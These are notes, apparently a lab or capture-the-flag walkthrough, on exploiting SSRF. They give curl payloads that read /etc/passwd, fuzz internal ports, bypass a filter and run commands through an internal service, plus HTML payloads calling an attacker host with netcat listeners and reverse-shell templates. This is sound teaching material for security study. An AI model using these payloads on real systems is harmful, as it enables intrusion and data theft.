- SSRF allows attackers to exploit servers to request internal/external resources.
- A successful SSRF attack can reveal sensitive information and lead to Remote Code Execution (RCE).
-
Nmap Scan:
nmap -sT -T5 --min-rate=10000 -p- $TARGET -
Curl Commands:
- Initial request:
curl -i -s http://$TARGET - Follow redirects:
curl -s -i -L http://$TARGET
- Initial request:
-
Netcat Listener:
nc -lnvp 8080
-
Curl Test:
curl -i -s "http://$TARGET/load?q=http://$ATTACKER:8080"
-
HTTP Schema:
- Create
index.htmlon attacker machine. - Start HTTP server:
python3 -m http.server $PORT - Curl Command:
curl -i -s "http://$TARGET/load?q=http://$ATTACKER:8000/index.html"
- Create
-
FTP Schema:
- Set up FTP server on attacker:
sudo pip3 install twisted sudo python3 -m twisted ftp -p 21 -r ~ - Curl Command:
curl -i -s "http://$TARGET/load?q=ftp://$ATTACKER/index.html"
- Set up FTP server on attacker:
-
File Schema:
- Retrieve
/etc/passwd:curl -i -s "http://$TARGET/load?q=file:///etc/passwd"
- Retrieve
-
Port Fuzzing:
- Create port wordlist:
for port in {1..65535}; do echo $port >> ports.txt; done
- Issue request on a random port:
curl -i -s "http://$TARGET/load?q=http://127.0.0.1:1" - Fuzz ports using ffuf:
ffuf -w ./ports.txt:PORT -u "http://$TARGET/load?q=http://127.0.0.1:PORT" -fs 30
- Create port wordlist:
-
Identify Open Port:
- Interact with services:
curl -i -s "http://$TARGET/load?q=http://127.0.0.1:5000"
- Interact with services:
-
Curl Interaction:
- Interact with internal:
curl -i -s "http://$TARGET/load?q=http://$INTERNAL/load?q=index.html"
- Interact with internal:
-
Bypass Filter Protection:
- Bypass filter:
curl -i -s "http://$TARGET/load?q=http://$INTERNAL/load?q=http::////127.0.0.1:1"
- Bypass filter:
-
Port Fuzzing for Internal:
- Fuzz ports with different Content-Length:
ffuf -w ports.list:PORT -u "http://$TARGET/load?q=http://$INTERNAL/load?q=http::////127.0.0.1:PORT" -fs 100
- Fuzz ports with different Content-Length:
-
Retrieve Interesting Files:
- Explore on port 5000:
curl -i -s "http://$TARGET/load?q=http://$INTERNAL/load?q=http::////127.0.0.1:5000/"
- Explore on port 5000:
-
Command Execution:
- Execute commands:
curl -i -s "http://$TARGET/load?q=http://$INTERNAL/load?q=http::////127.0.0.1:5000/runme?x=id"
- Execute commands:
-
URL-encode Payloads:
- Using Cyberchef or JQ for URL-encoding.
-
Retrieve Flag:
- Retrieve flag:
curl -i -s "http://$TARGET/load?q=http://$INTERNAL/load?q=http::////127.0.0.1:5000/runme?x=cat%2520/root/flag.txt"
- Retrieve flag:
- Blind SSRF: Vulnerability where SSRF is present but not displayed on the front end.
- Detection: Test if the server processes requests to external resources (own services or Burp Collaborator).
-
Payload Creation:
- Create an HTML file (payload) for the application.
<!DOCTYPE html> <html> <body> <a>Hello World!</a> <img src="http://<10.10.15.54:5555/x?=viaimgtag"> </body> </html>
-
Netcat Listener:
- Set up Netcat listener:
nc -lnvp 5555
- Set up Netcat listener:
-
Upload HTML File:
- Upload the HTML file to the target.
- Confirm vulnerability if response seen in Netcat listener.
-
Exfiltration via Blind SSRF:
- Create HTML file for exfiltration.
<html> <body> <b>Exfiltration via Blind SSRF</b> <script> // JavaScript code for exfiltration </script> </body> </html>
- Set up Netcat listener.
- Upload HTML file and decode the obtained data.
-
Leverage wkhtmltopdf:
- wkhtmltopdf's vulnerability for server takeover.
- Create HTML file for file reading and exfiltration.
-
Reverse Shell via Blind SSRF:
- Create HTML file for reverse shell.
<html> <body> <b>Reverse Shell via Blind SSRF</b> <script> // JavaScript code for reverse shell </script> </body> </html>
- Set up Netcat listener:
nc -lnvp 5555 - Upload HTML file to get a reverse shell.
Note: Always ensure ethical and legal use of these techniques. Unauthorized access and exploitation of systems is against the law.